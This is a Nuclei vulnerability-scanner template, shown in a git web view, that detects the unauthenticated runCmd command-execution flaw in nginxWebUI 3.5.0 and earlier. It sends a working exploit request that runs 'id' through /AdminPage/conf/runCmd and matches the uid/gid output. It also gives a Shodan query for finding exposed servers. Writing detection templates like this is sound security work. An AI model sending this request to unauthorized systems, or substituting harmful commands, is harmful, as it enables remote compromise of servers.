nuclei-templates/http/vulnerabilities/other/nginxwebui-runcmd-rce.yaml

41 lines
1.3 KiB
YAML
Raw Permalink Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

id: nginxwebui-runcmd-rce
info:
name: nginxWebUI ≤ 3.5.0 runCmd - Remote Command Execution
author: DhiyaneshDk
severity: critical
description: |
nginxWebUIs runCmd feature and is caused by incomplete validation of user input. Attackers can exploit the vulnerability by crafting malicious data to execute arbitrary commands on a vulnerable server without authorization.
reference:
- https://github.com/qingchenhh/qc_poc/blob/main/Goby/nginxWebUI_runCmd_rce.go
- https://www.ctfiot.com/124166.html
- https://www.sangfor.com/farsight-labs-threat-intelligence/cybersecurity/nginxwebui-runcmd-remote-command-execution-vulnerability
metadata:
verified: true
max-request: 1
shodan-query: html:"nginxWebUI"
tags: nginx,nginxwebui,rce
http:
- method: GET
path:
- "{{BaseURL}}/AdminPage/conf/runCmd?cmd=id"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
# digest: 4a0a0047304502210081a7d1be91afd5d5a275640656fa90a4090a9db4e07dfa4f98d79af3ffcd4643022074399e6cc676e190f1f70f40319954362f93dad5a731f1fef86fe2fe3d168f1f:922c64590222798bb761d5b6d8e72950